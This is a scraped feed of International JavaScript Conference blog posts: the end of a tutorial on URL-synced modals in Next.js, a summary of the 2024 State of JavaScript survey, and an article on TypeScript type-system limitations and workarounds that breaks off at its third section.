Using semantic HTML and ARIA attributes ensures that screen readers understand the structure and purpose of the modal.

  • Add role=”dialog” to the modal container to define it as a dialog window.
  • Use aria-modal=”true” to indicate that interaction with elements outside the modal is restricted.

Why this is important:
ARIA attributes provide assistive technologies such as screen readers with the necessary context to communicate the purpose of the modal to the user. This ensures a consistent and inclusive user experience.

Error handling and edge cases

Handling edge cases ensures that your modal behaves predictably in all scenarios. Here are some considerations:

Handle Refreshes

Since the modal state is tied to the URL, refreshing the page should display the appropriate content. In Next.js, this happens naturally due to the server-rendered /feedback route and the modal implementation.

Close modal on invalid routes

If the user navigates to an invalid route, the modal should close or render nothing. A catch-all route ([…catchAll]) in the @modal slot ensures this:

export default function CatchAll() {
  return null; // Ensures the modal slot is empty
}

Smooth navigation

Ensure that navigating to another part of the application closes the modal. Using router.back() in the modal close button ensures that the user is returned to the previous route.

Listing 10:

<button
  onClick={() => router.back()}
  aria-label="Close"
  className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
>
  ✖
</button>

Why it matters:

Graceful navigation plays a key role in providing a consistent and predictable user experience, even when users interact with modals in unexpected ways. By ensuring that modal behaviour aligns with navigation actions, such as using the back or forward buttons, users can move through the application naturally without encountering inconsistencies.

Catch-all routes further enhance robustness by preventing unnecessary or unintended content from being rendered in the modal slot. They act as a safeguard, ensuring that only valid routes display content, while invalid or undefined routes leave the modal slot empty. Together, these strategies create a more reliable and user-friendly application.

EVERYTHING ABOUT REACT & NEXT.JS

Explore the iJS React.js & Next.js Track

Comparison and use cases

Comparison: URL-synced modals vs. traditional client-side modals

When building modals, developers often rely on client-side state management to control their visibility. While this approach is straightforward, it has several limitations compared to URL-synced modals in Next.js:

Feature Client-side modals URL-synced modals in Next.js
Deep Linking Not supported. Users can’t share or bookmark the modal state. Fully supported. Modal states are linked to specific URLs.
Refresh Behaviour When the page is refreshed, the modal state is reset and closed. The modal state persists across refreshes.
Navigation Consistency Backwards or forward navigation cannot close or reopen the modal. Modals respect browser navigation, closing or reopening correctly.
Scalability State management for complex modals can be difficult in large applications. Simplified state management using URL routes.
SEO and Accessibility Modals are not indexed or accessible via URLs. Can be indexed and shared where appropriate.

Why URL-synchronised modals are important:

These features significantly enhance the user experience by enabling deep linking, allowing users to share and bookmark specific modal states with ease. Navigation consistency ensures that actions like using the back or forward buttons behave as expected, seamlessly opening or closing modals without disrupting the flow of the application. For developers, Next.js simplifies state management by leveraging its routing mechanisms, eliminating the need for complex custom logic to control modal behaviour. This combination of improved usability and reduced development complexity makes Next.js an ideal framework for building modern, shareable modals.

Practical use cases for URL-synced modals

Next.js makes URL-synced modals versatile and scalable. Here are a few common use cases:

Feedback forms

As this article shows, feedback forms are ideal for modals. Users can easily share a link to the form (/feedback), and the form remains accessible even after a page refresh.

Photo galleries with previews

Imagine a gallery where users can click on a thumbnail to open a photo preview in a modal. With URL-synchronised modals:

  • Clicking on a photo updates the URL (e.g. /gallery/photo/123).
  • Users can share the link, allowing others to view the photo directly.
  • Navigating backwards or forwards closes or reopens the modal.

Shopping Cart and Side Panels

E-commerce applications often use modals for shopping carts. With URL-synced modals:

  • The cart can be linked to a route such as /cart.
  • Users can share their cart link with preloaded items.
  • Refreshing the page keeps the cart open, preventing it from losing its state.

Authentication and login

For applications that require authentication, login forms can be presented as modals. A user clicking “Login” could open a modal linked to “/login.” When the modal is closed or the user navigates elsewhere, the state remains predictable.

Notifications and Wizards

  • Notifications: Display announcements or updates in a modal tied to a route, such as /announcement.
  • Onboarding Wizards: Guide users through a multistep onboarding process, with each step linked to a unique URL (e.g. /onboarding/step-1).

When to avoid URL-synced modals

Although URL-synced modals are powerful, they are not appropriate for every scenario. Consider avoiding them in the following cases:

  • Highly transient states: Modals used for brief interactions (such as confirming a delete action) may not require URL updates.
  • Sensitive data: If the modal contains sensitive information, ensure that deep linking and sharing are restricted.
  • Non-navigable workflows: If the modal does not require navigation controls (e.g. forward/backwards), simpler client-side modals may be sufficient.

With these comparisons and use cases, developers can make informed decisions about when and how to implement URL-synced modals in their Next.js projects.

iJS Newsletter

Keep up with JavaScript’s latest news!

Conclusion

URL-synchronised modals in Next.js provide a modern solution to the common challenges developers face when implementing modals in web applications. By leveraging features such as intercepting and parallel routes, Next.js enables deep linking, navigation consistency, and improved user experience – all while simplifying state management.

Key Takeaways

  1. Improved user experience:
    URL-synchronised modals allow users to share, bookmark, and revisit specific modal states without breaking functionality. They also respect browser navigation, ensuring that modals open and close as expected.
  2. Simplified state management:
    By tying modal states to the URL, developers can avoid the complexity of managing client-side state for modals in large applications.
  3. Broad applicability:
    From feedback forms and photo galleries to shopping carts and onboarding wizards, URL-synced modals provide a scalable and reusable solution for multiple use cases.

Recommendations:

  • Use Next.js’ intercepting and parallel routes to create modals that integrate seamlessly into your application.
  • Focus on accessibility by implementing ARIA roles, focus trapping, and logical navigation.
  • Evaluate whether URL-synced modals are appropriate for your specific use case, especially when dealing with transient or sensitive data.

For a complete example of building a feedback modal with URL-synced functionality in Next.js, check out my GitHub repository.

If you’re ready to take your Next.js projects to the next level, try implementing URL-synced modals today. They are not only user-friendly but also developer-friendly, making them a great addition to any modern web application.

 

The post Shareable Modals in Next.js: URL-Synced Overlays Made Easy appeared first on International JavaScript Conference.

]]>
The 2024 State of JavaScript Survey: Who’s Taking the Lead? https://javascript-conference.com/blog/state-of-javascript-ecosystem-2024/ Wed, 05 Feb 2025 10:48:23 +0000 https://javascript-conference.com/?p=107421 Dominating frontend development, JavaScript continues to be one of the most widely used programming languages and the cornerstone of web development. As we step into 2025, we’ll take a closer look at the state of JavaScript in 2024, highlighting the major trends and the most popular frameworks so you can stay ahead of the curve.

The post The 2024 State of JavaScript Survey: Who’s Taking the Lead? appeared first on International JavaScript Conference.

]]>
The State of Developer Ecosystem Report 2024 by JetBrains gives a snapshot of the developer world, based on insights from 23,262 developers worldwide. The survey shows that JavaScript remains the most-used programming language globally, with 61% of developers using it to build web pages.


Figure 1: Which programming languages have you used in the last 12 months? (source: JetBrains)

Key Takeaways

  • Demographically, the U.S. represented a large share of respondents with 15%, followed by Germany at 8%, France at 7%, and Spain and the United Kingdom at 4% each.
  • The average age of survey respondents was 33.5 years. Age and income were positively correlated, and younger respondents showed more gender diversity, suggesting changing demographics.
  • 51% of participants had 10 years or less of experience, while 33% had between 10 and 20 years of experience.
  • 95% of respondents used JavaScript in a professional capacity, and 40% used it as a hobby in 2024, up from 91% and 37% in 2023.
  • 98% reported using JavaScript for frontend development and 64% for backend. Additionally, 26% used it for mobile apps and 18% for desktop apps.

Figure 2: JavaScript use case (source: State of JS)

 

The most common application patterns remain the classic ones: Single-Page Apps (90%) and Server-Side Rendering (59%). Static Site Generation came in third position with 46%.

The survey also looked at AI usage to generate code. 20% of respondents said they never use it for coding, while 7% reported using it about half the time.

iJS Newsletter

Keep up with JavaScript’s latest news!

TypeScript vs. JavaScript

TypeScript has seen impressive growth, as its adoption has risen from 12% in 2017 to 35% in 2024, according to JetBrains’ report. 67% of respondents reported writing more TypeScript than JavaScript code, and the largest group consists of people who only write TypeScript.

Figure 3: TypeScript usage (source: State of JS)

 

TypeScript’s popularity is due to its enhanced features to write better JavaScript code. It detects errors early during development, improves code quality, and makes long-term maintenance easier, which is a huge plus for developers. However, TypeScript isn’t here to replace JavaScript. They’ll just coexist, giving developers more options based on what they need and prefer.

Libraries and Frameworks

Webpack is the most used JavaScript tool, as 85.3% of respondents reported using it. However, Vite takes the lead for the most loved, earning 56% of positive feedback. Despite being relatively new, Vite is also the third most used tool with 78.1% adoption.

React came in second for both most used (81.1%) and most loved (46.7%). 

Angular, on the other hand, ranked eighth with 50.1% usage and 23.3% positive feedback, falling behind tools like Jest, Next.js, Storybook, and Vue.js.


Figure 4: Libraries experience grouped by usage (source: State of JS)

Figure 5: Libraries experience grouped by sentiment (source: State of JS)

The survey also highlights usage trends of frontends frameworks over time. While React remains in the top spot, Vue.js continues to overtake Angular, holding on to its position as the second most used framework.

React keeps reinventing itself, transitioning from being just a library to evolving into a specification for frameworks. With the release of version 19 in December, it introduced support for web components along with new hooks and form actions that redefine how forms are handled in React. 

Vue.js’ popularity can be attributed to its flexible, comprehensive, and advanced features, which appeal to both beginners and experienced developers. Daniel Roe from the Nuxt core team credits the ecosystem’s growth to its UI libraries, with Tailwind CSS playing a key role. Its convention-based approach and cross-framework compatibility make it easier to port libraries like Radix Vue from their React counterparts. 

Angular’s third-place ranking is still a good position, as many developers and companies continue to use it for its performance, safety, and scalability. Its ecosystem, TypeScript integration, and features like dependency injection still make it an attractive choice for web development.  

Svelte’s usage is also growing steadily, with developers showing increasing favor for it after it released version 5 in October. According to Best of JS, one of its major highlights is the introduction of “runes,” a new mechanism for declaring reactive state.

Figure 6: Frontend frameworks ratios over time (source: State of JS)

iJS Newsletter

Keep up with JavaScript’s latest news!

Challenges and Limitations  

When asked about their biggest struggle with JavaScript, 32% of respondents pointed to the lack of a built-in type system, far ahead of browser support issues, which only 8% mentioned.

Regarding browser APIs, poor browser support was the biggest issue for 35% of respondents. Safari and the lack of documentation on browser features also came up as common problems with 6% and 5% mentions, respectively.

React, as the most used frontend framework, was also the most criticized, with 14% of respondents complaining about having issues with it. Common issues related to frameworks included excessive complexity, poor performance, choice overload, and breaking changes.

It’s exciting to see how the JavaScript ecosystem will develop in 2025, unlocking new possibilities for web development. The growing use of TypeScript will solidify as a standard for large-scale applications due to its type safety and improved developer tooling. We’ll also see the rise of server-side rendering (SSR) frameworks like Next.js and Nuxt.js, enhancing both performance and SEO. Additionally, React and Angular will continue to push forward with updates focused on optimizing the developer experience and simplifying app development. If you’re interested in diving deeper into these topics, make sure to check out our conference program for more insights and expert-led sessions!

If you want to get more details, check the JavaScript Survey page.

The post The 2024 State of JavaScript Survey: Who’s Taking the Lead? appeared first on International JavaScript Conference.

]]>
TypeScript’s Limitations and Workarounds https://javascript-conference.com/blog/typescript-limitations-workarounds/ Mon, 16 Dec 2024 14:20:26 +0000 https://javascript-conference.com/?p=107028 TypeScript, while a powerful programming language, has limitations that arise from its type system's attempt to manage dynamically typed JavaScript code. From handling return types and function expressions to the behavior of else statements, developers often encounter challenges when working with TypeScript files. Issues can emerge at compile time, especially when using generic functions, creating an instance, or managing type information. This article explores the blind spots in TypeScript, such as handling function objects, top-level constructs, and dynamically typed scenarios, offering insights into workarounds and practical solutions.

The post TypeScript’s Limitations and Workarounds appeared first on International JavaScript Conference.

]]>
TypeScript’s type system effectively manages much of JavaScript’s dynamism in useful ways, rather than eliminating it. Developers writing TypeScript code can use almost the full range of web technologies in a type-safe manner. However, when issues arise, they’re often the result of the developer’s choices, not the tools themselves.

Most developers follow well-established patterns in their day-to-day programming. Modern frameworks and tools provide solid structures to guide us, offering solutions and guidelines for nearly every question. However, the complexity and long history of the modern web platform ensure that surprises still occur and new, sometimes unsolvable, challenges continue to emerge.

This issue extends beyond people to include their tools and machines. No one can do everything, and certainly, not every tool is suited to every task. TypeScript is no exception: while it can accurately describe 99% of JavaScript features, one percent remains beyond its grasp. This gap doesn’t only consist of reprehensible anti-features. Some JavaScript features that TypeScript doesn’t fully understand can still be useful. Additionally, for some other features, TypeScript operates under assumptions that can’t always align with reality.

Like any tool, TypeScript isn’t perfect; and we should be aware of its blind spots. This article addresses three of these blind spots, offers possible workarounds, and explores the implications of encountering them in our code.

Blind Spot 1: Excluding subtypes in type parameters

The Liskov substitution principle requires that a program can handle subtypes of T wherever a type T is expected. The classic example of object orientation still serves as the best illustration of this principle (Listing 1).

Listing 1: The classic OOP example with animals

class Dog {
  name: string;
  constructor(name: string) {
    this.name = name;
  }
}

class Collie extends Dog {
  hair = "long";
}

let myDog: Dog = new Collie("Lassie");
// Works!

It makes perfect sense that a Collie instance is assigned to a variable of type Dog, because a Collie is a dog with long hair. The object that ends up in the myDog variable provides all the functions required by the Dog type annotation. The fact that the object can do more (for example, show off long hair) is irrelevant in this context. But what if that additional feature does matter?

Thanks to structural subtyping, TypeScript allows any object that fulfills a given API contract (or implements a given interface) to be treated as a “subtype” (Listing 2).

Listing 2: Structural subtyping in Action

class Dog {
  name: string;
  constructor(name: string) {
    this.name = name;
  }
}

type Cat = { name: string };

let myPet: Cat = new Dog("Lassie");
// Works!

In web development, where developers don’t have to manually create every object from a class constructor, this rule is very pragmatic. On one hand, it results in relatively minor semantic errors (Listing 3), but on the other, it can also lead to more significant pitfalls.

Listing 3: Structural subtyping triggers an error

type RGB = [number, number, number];
let green: RGB = [0, 100, 0];

type HSL = [number, number, number];
let red: HSL = [0, 100, 50];

red = green;
// Works! RGB and HSL have the same structure_
// But is that OK at runtime?_

Let’s look at a function that accepts a parameter of type WeakSet< any >:

function takesWeakSet(m: WeakSet<any>) {}

In JavaScript, weak sets are sets with special garbage collection features. They only hold weak references to their contents and can’t cause memory leaks. However, unlike normal sets, weak sets lack many features, mainly all iteration mechanisms. While normal sets can function as universal lists as well as sets, weak sets can only tell us whether they contain a given value, something normal sets can do too. This means that the WeakSet API is a subset of the Set API, meaning that Set is a subtype of WeakSet (Listing 4).

Listing 4: WeakSets and Sets as subtypes

function takesWeakSet(m: WeakSet<any>) {}

// Works obviously
takesWeakSet(new WeakSet());

// Works too, Set is a subtype of WeakSet
takesWeakSet(new Set());

// But is that OK at runtime?

Depending on the function’s intent, this can either be a non-issue (as with Dog and Collie), an easily identifiable problem (as with RGB and HSL), or it can lead to subtle, undesired behavior in our program. When takesWeakSet() expects to receive a true WeakSet, it might store new values in the set and assume that it doesn’t need to worry about removing them later. After all, weak sets automatically prevent memory leaks. However, this assumption can be undermined if Set is considered a subtype of WeakSet.

So, while it’s often safe to accept subtypes of a given type, it’s not always so straightforward. In this case, the implementation is relatively simple, but it’s not possible to generalize this approach.

iJS Newsletter

Keep up with JavaScript’s latest news!

Unfortunately, subtypes have to stay out

With type-level programming, it’s comparatively easy to construct a type that accepts another type but rejects its subtypes. The key tool for this is generic types, which we can consider to be type functions (Listing 5).

Listing 5: Generic Types as Type Functions

// Type function that wraps the parameter T
// in an array
type Wrap<T> = [T];

// Corresponding JS function that
// wraps the parameter t in an array
let wrap = (t) => [t];

In generic types, we can use conditional types, which work just like the ternary operator in JavaScript (Listing 6).

Listing 6: Conditional Types

// A extends B = “is A a subtype of B?”
// In other words: “is A a subtype of B?”
type Test<T> = T extends number? true : false;

type A = Test<42>; // true (42 is assignable to number)
type B = Test<[]>; _// false ([] is not assignable to number)

Equipped with this knowledge, we can now formulate a type function that accepts two type parameters and determines whether the first parameter exactly matches the type of the second parameter. This is true only if the first parameter is assignable to the second and the second parameter is assignable to the first. If either of these conditions doesn’t apply, then either the first parameter must be a subtype of the second, the second must be a subtype of the first, or both parameters must be completely incompatible. In code, this is illustrated in Listing 7.

Listing 7: ExactType<Type, Base>

type ExactType<Type, Base> =
  Type extends Base
    ? Base extends Type
      ? Type
      : never
    : never;

type A = ExactType<WeakSet<any>, WeakSet<any>>;
// Result: WeakSet<any> - A and B are the same

type B = ExactType<Set<any>, WeakSet<any>>;
// Result: never - A is a subtype of B

type C = ExactType<WeakSet<any>, Set<any>>;
// Result: never - B is a subtype of A

type D = ExactType<WeakSet<any>, string>;
// Result never - A and B are incompatible

The type never, used here to model the case where the type and base are different, is a type to which no value can be assigned. Each data type represents a set of possible values (e.g., number is the set of all numbers and Array< string > is the set of all arrays filled with strings), while never represents an empty set. No error, no exception: never simply stands for nothing.

We can now use ExactType<Type, Base> to modify takesWeakSet() so that it only accepts weak sets. We just have to make the function generic and then define the type for the value parameter m with ExactType (Listing 8).

Listing 8: ExactType<Type, Base> in action

type ExactType<Type, Base> =
  Type extends Base
    ? Base extends Type
      ? Type
      : never
    : never;

function takesWeakSet<T>(m: ExactType<T, WeakSet<any>>) {}

// Works obviously
takesWeakSet(new WeakSet());

// No longer works!
takesWeakSet(new Set());

The reason why the call with the normal set does not work is that ExactType<Type, Base> computes the type never as a result here, and since no value (and certainly no set object) fits into never, the TypeScript compiler complains at this point as desired. Problem solved?

The difficult subtype exclusion in type parameters

If we can treat generic types like functions, as we suggested earlier, then it should be possible to reproduce the features of the runtime function takesWeakSet() as a type function. As it stands now, the function only accepts a parameter that is restricted to an exact subtype, so it should be possible. The skeleton, a generic type with a type parameter, is easy to set up:

type TakesWeakSet<M> = {}; 

Since any arbitrary data type can be used here, we need a type for the type T. Fortunately, this isn’t a problem, as extends clauses can be used both in conditional types and as restrictions for type parameters:

type TakesWeakSet<M extends WeakSet<any>> = {}; 

This puts the type function in the same state that takesWeakSet() was in initially: it’s a single-argument function with a type annotation that specifies a minimal requirement for the input. Subtypes are still accepted (Listing 9).

Listing 9: Subtypes as Input

type TakesWeakSet<M extends WeakSet<any>> = {};

// Obviously works
type A = TakesWeakSet<WeakSet<any>>;

// Also works, Set is a subtype of WeakSet
type B = TakesWeakSet<Set<any>>;

That’s not a problem, as that’s exactly why we wrote ExactType. However, there is a fundamental difference between the type function TakesWeakSet<M> and the runtime function takesWeakSet(m). The latter, if we look closely, has one more parameter than the former (Listing 10).

Listing 10: Type and runtime function in comparison

// One parameter “M”
type TakesWeakSet<M extends WeakSet<any>> = {};

// One parameter “m” AND one type parameter T
function takesWeakSet<T>(m: ExactType<T, WeakSet<any>>) {}

A call to the runtime function takesWeakSet() passes two parameters: a type parameter and a value parameter. The type parameter is used to calculate the type of the value parameter, where an error occurs if ExactType returns never. The type function ExactType is key to excluding subtypes. This trick can’t be reproduced at the type level because self-referential type parameters aren’t allowed, except in a few special cases that aren’t relevant here (Listing 11).

Listing 11: No self-referential constraints in type parameters

// Error: “Type” cannot be input for
// its own constraints
type TakesExact<Type extends ExactType<
  Type,
  WeakSet<any>>
> = {};

What would work, however, is to move the logic from ExactType to TakesExact. This wouldn’t reject subtypes, but would instead translate them to never, resulting in no error, just a likely unhelpful result (Listing 12).

Listing 12: TakesExact with the logic of ExactType

type TakesExact<Type> = Type extends WeakSet<any>
  ? WeakSet<any> extends Type
    ? Type
    : never
  : never;

type R1 = TakesExact<WeakSet<{}>>;
// OK, R1 = WeakSet<{}>

type R2 = TakesExact<Set<string>>;
// OK, R2 = never (NO error)

type R3 = TakesExact<Array<string>>;
// OK, R3 = never (NO error)
 

Regardless of how you approach it, rejecting parameters that are subtypes of a given type or enforcing an exact type at the type level isn’t possible. TypeScript has a blind spot here. But is this truly a problem?

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

How do we deal with subtype constraints at the type level?

The golden rule of programming in statically typed languages is: “Make invalid states unrepresentable.” If developers can write code in such a way that it prevents the program from taking wrong paths (e.g., by using exact type annotations to eliminate invalid inputs), they can save a lot of time debugging unwanted states. In principle, this rule is invaluable and should be followed whenever possible. However, it isn’t always feasible in the unpredictable world of JavaScript and TypeScript development.

To summarize, our goal was to create a program where a variable of type T can only be assigned values of type T and not any of its subtypes. We’ve succeeded in doing this in the runtime code, but we’ve failed at the type programming level. However, according to the Liskov substitution principle, this restriction may be unnecessary. After all, a subtype of T inherently has all the functions of T– so why do we need the restriction in the first place?

In our case, the key factor is that a Set and a WeakSet have very different semantics, even though the WeakSet API is a subset of the API of Set. In TypeScript’s type system, this means that Set is evaluated as a subtype of WeakSet, leading to the assumption of a relationship and substitutability where none exists. This blind spot in the type system leads us to solve a problem that isn’t actually a problem at all, and which we ultimately can’t resolve, especially at the type level.

Instead, we have to accept that the TypeScript type system doesn’t correctly model every detail of JavaScript objects and their relationships. Structural subtyping is a very pragmatic approach for a type system that attempts to describe JavaScript, but it’s not particularly selective. If we find ourselves in a situation where we want to ban subtypes from certain program parts despite TypeScript’s resistance, we should ask ourselves two questions:

  1. Do we really need to exclude subtypes, or would the program work with subtypes? Can we rewrite the program to work with subtypes like any other program?
  2. Are we trying to exclude subtypes to compensate for blind spots in the TypeScript type system (as in the Set/WeakSet example)?

For the second case, the solution is simple: don’t use the type system for this task. Trying to exclude subtypes is essentially working against what TypeScript is designed to do (a type system based on structural subtyping) and attempting to compensate for a limitation within TypeScript itself. A more pragmatic approach would be to simply defer the distinction between two types that TypeScript has assessed incorrectly to the runtime. In the case of Set and WeakSet, this is particularly trivial because JavaScript knows that these two objects are unrelated (Listing 13).

Listing 13: Runtime distinction between Set and WeakSet

new WeakSet() instanceof WeakSet
// > true

new Set() instanceof WeakSet
// > false

“Make invalid states unrepresentable” is still a valuable guideline. However, in TypeScript, we sometimes need to use methods other than the type system to implement this, because the type system can’t accurately model every relationship between JavaScript objects. The type system only looks at the API surfaces of objects, and sometimes seemingly related surfaces hide entirely different semantics. In such cases, we shouldn’t use the type system to solve the problem but rather use a more appropriate solution.

Blind Spot 2: Non-Modelable Intermediate States

Combining an object from a list of keys and a parallel list of values of the same length is trivial in JavaScript, as we see in Listing 14.

Listing 14: JS function combines two lists into one object

function combine(keys, vals) {
  let obj = {};
  for (let i = 0; i < keys.length; i++) {
    obj[keys[i]] = vals[i];
  }
  return obj;
}

let res = combine(["foo", "bar"], [1337, 9001]);

// res = { foo: 1337, bar: 9001 }

Imperative programming doesn’t get any easier than this: you take a bunch of variables and manipulate them until the program reaches the desired target state. But as we all know, this programming style can be error-prone. Every for loop is an off-by-one error in training. So it makes sense to secure this code snippet as thoroughly as possible with TypeScript.

First, we need to ensure that keys and values are tuples (i.e. lists of finite length). The content of keys should be restricted to valid object key data types, while values can contain any values, but must have the exact same length as keys. This isn’t particularly difficult: we can constrain the type variable K for keys to be a tuple with matching content, and then use K as a template to create a tuple of the same length full of any, which is exactly the appropriate restriction for values (Listing 15).

Listing 15: Function signature restricted to two tuples of equal length

type AnyTuple<Template extends any[]> = {
  [I in keyof Template]: any;
};

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V) {
  // ... Rest ...
}

With a type K of all keys and a type V of all values, we can then construct an object type that describes the result of the combine() operation. This is a bit complex, but we can manage. First, we need the auxiliary type UnionToIntersection< T >, which, as the name suggests, turns the members of a union T into an intersection type. The syntax looks a bit weird, and the underlying mechanics of distributive conditional types are equally strange. Overall, I prefer not to dive into the details right now. The key takeaway is that UnionToIntersection< T > turns a union into an intersection (Listing 16).

Listing 16: UnionToIntersection< T >

type UnionToIntersection<T> =
  (T extends any ? (x: T) => any : never) extends
  (x: infer R) => any ? R : never;

type Test = UnionToIntersection<{ x: number } | { y: string}>
// Test = { x: number } & { y: string }
 

With this tool, we can now model a type that, similar to the combine() function, combines two tuples into one object, if we can think creatively. Step 1 is to write a generic type that accepts the same type parameters as combine() (Listing 17).

Listing 17: Type Combine<K, V>

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = {};

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = {}

Step 2: A new tuple is temporarily created with a mapped type that has the same number of positions as K and V (Listing 18).

Listing 18: Two tuples become one tuple

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = {
  [Index in keyof K]: any;
}

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = [any, any]

At first glance, this maneuver seems to distract us from our actual goal, as we want to turn tuples into an object, not just another tuple. However, to do this, we need access to the indices of the input tuples, which is achieved here by the type variable index. This allows us to replace any on the right side of the mapped type with an object type that models a name-value pair of our target object (Listing 19).

Listing 19: Two tuples become one tuple of objects

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = {
  [Index in keyof K]: {
    [Field in K[Index]]: V[Index];
  };
};

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = [{ foo: 1337 }, { bar: 9001 }]

Now we get a tuple that at least contains all the building blocks of our target object. To unpack it, we index the tuple with number, which leads us to a union of the tuple contents (Listing 20). We can then combine this union into an object type using UnionToIntersection< T > (Listing 21). Mission accomplished!

Listing 20: Two tuples become a union of objects

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = {
  [Index in keyof K]: {
    [Field in K[Index]]: V[Index];
  };
}[number];

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = { foo: 1337 } | { bar: 9001 }

Listing 21: Two tuples become one object

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = UnionToIntersection<{
  [Index in keyof K]: {
    [Field in K[Index]]: V[Index];
  };
}[number]>;

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = { foo: 1337, bar: 9001 }
// Genaugenommen { foo: 1337 } & { bar: 9001 }

The result is syntactically a bit strange, but at the type level it does what the combine() function does in the runtime area: two tuples in, combined object out (Listing 22).

Listing 22: Combine Type vs. Combine Function

type Test = Combine<[“foo”, “bar”], [1337, 9001]>;
// Type “Test” = { foo: 1337, bar: 9001 }

let test = combine([“foo”, “bar”], [1337, 9001]);
// Value “test” = { foo: 1337, bar: 9001 }

And if we have a type that models the exact same operation as a runtime function, we can logically use the former to annotate the latter. Right?

The problem with the imperative iteration

Before we add Combine<K, V> to the signature of combine(keys, values), we should fire up TypeScript and ask what it thinks of the current state of our function (without return type annotation). The compiler is not impressed (Listing 23).

Listing 23: Current state of combine()

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V) {
  let obj = {};
  for (let i = 0; i < keys.length; i++) {
    obj[keys[i]] = vals[i]; // <- Error here
  }
  return obj;
}

The key part of the error message is “No index signature with a parameter of type ‘string’ was found on type ‘{}’”. The reference to the type {} comes from the initialization of the obj variable two lines earlier. Since there is no type annotation, the compiler activates its type inference and determines the type {} for obj, based on its initial value– the empty object. Naturally, this means we can’t add any additional fields to this type. But is this type even correct? After all, the function is supposed to return Combine<K, V> as the type. So we add to the initialization what the variable should have at the end (Listing 24).

Listing 24: combine() with Combine<K, V> as annotation

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V) {
  let obj: Combine<K, V> = {}; // <- Error here
  for (let i = 0; i < keys.length; i++) {
    obj[keys[i]] = vals[i];
  }
  return obj;
}

Another error appears. This time, TypeScript reports “Type ‘{}’ is not assignable to type ‘Combine<K, V>’”, which is also understandable. After all, we’re claiming that the variable obj contains the type Combine<K, V> but we’re initializing it with the incompatible value {}. That can’t be correct either. So, what is the correct approach?

The truth is, nothing is correct. The operation that combine(keys, values) performs is not describable with TypeScript in the way it’s implemented here. The problem is that the result object obj mutates from {} to Combine<K, V> in several intermediate steps during the for loop, and that TypeScript doesn’t understand such state transitions. The whole point of TypeScript is that a variable has exactly one type, and it can’t change types (unlike in vanilla JavaScript). However, such type changes are essential in scenarios where objects are iteratively assembled because each mutation represents a new intermediate state on the way from A to B. TypeScript can’t model these intermediate states, and there is no correct way to equip the combine(keys, values) function with type annotations.

iJS Newsletter

Keep up with JavaScript’s latest news!

What to do with intermediate states that can’t be modeled?

The TypeScript type system is a huge system of equations in which the compiler searches for contradictions. This always happens for the program as a whole and without executing the program. This means that, by design, TypeScript can’t fully understand various language constructs and features, no matter how hard we try. Under these circumstances, the question arises: if we can’t do it right, what should we do instead?

One option is to align the runtime code more closely with the limitations of the type system. After all, there are various means of functional programming in runtime JavaScript. Instead of writing types that are oriented towards runtime JavaScript, it’s often possible to write runtime JavaScript that is based on the types. However, this doesn’t always work and may not be feasible in some teams. Some developers may enjoy writing JavaScript code in such a way that every loop is replaced by recursion, while others would like to keep their imperative language constructs, especially async/await and try/catch.

The more pragmatic solution is to accept the possibilities and limitations of our tools and work with what we have. Unmodelable intermediate states are bound to occur when writing low-level imperative code. If the type system can’t represent them, we need to handle them in other ways. Unit tests can ensure that the affected functions do what they’re supposed to do, documentation and code comments are always helpful, and for an extra layer of safety, we can use runtime type-checking if needed.

I’ve adapted a feature from the programming language Rust for functions with an imperative core that is inscrutable for TypeScript. Rust’s type system is stricter than TypeScript’s, enforcing much more granular rules of data and objects. However, there is a way out: code blocks marked with the unsafe keyword can (to some extent) perform operations that the type system would normally prevent (Listing 25).

Listing 25: unsafe in Rust

// This Rust program uses the C language's foreign
// function interface for the abs() function,
// which the Rust compiler cannot guarantee anything about
extern "C" {
  fn abs(input: i32) -> i32;
}

// To be able to call the C function abs() without
// the corresponding code must be wrapped in “unsafe”
fn main() {
  unsafe {
    println!(
      "Absolute value of -3 according to C: {}",
      abs(-3)
    );
  }
}

In its core idea, it’s somewhat comparable to the TypeScript type any, as in both cases developers assume responsibility for what the type checker would normally do. The advantage of unsafe in Rust is that it directly signals that the compiler doesn’t guarantee type safety for the affected area and that maximum caution is required when using it. This is precisely what we want to express for our combine(keys, values) function. First, we have to get the function to work by typing the result object as any (Listing 26).

Listing 26: combine() with any

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V) {
  let obj: any = {}; // <- anything goes
  for (let i = 0; i < keys.length; i++) {
    obj[keys[i]] = vals[i];
  }
  return obj;
}

This makes the code in the function executable and the compiler no longer complains, since any allows everything. We can now use our type Combine<K, V> to annotate the return type (Listing 27).

Listing 27: combine() with any and Combine<K, V>

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V): Combine<K, V> {  // <- works
  /* Rest */
}

This works because the type any also allows it to be assigned to another, stricter type. This function now has a very well-defined interface with strict input and output types, but a core that isn’t protected by the type system. For trivial functions, it’s sufficient to ensure correct functioning with unit tests, and to make the character of the function even more obvious you could add unsafe to its name (Listing 28).

Listing 28: unsafeCombine()

function unsafeCombine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V): Combine<K, V> {
  /* Rest */
}

Anyone who calls this function can tell from its name that special care is required. Reading the source code makes it clear that the any annotation on the return object wasn’t added out of desperation, time pressure, or inexperience by the developers, but rather as a workaround for a TypeScript blind spot based on careful consideration. No tool is perfect (especially not TypeScript), and dealing with a tool’s limitations confidently and pragmatically is the hallmark of true professionals.

Blind spot 3: Side effects of mix-in modules

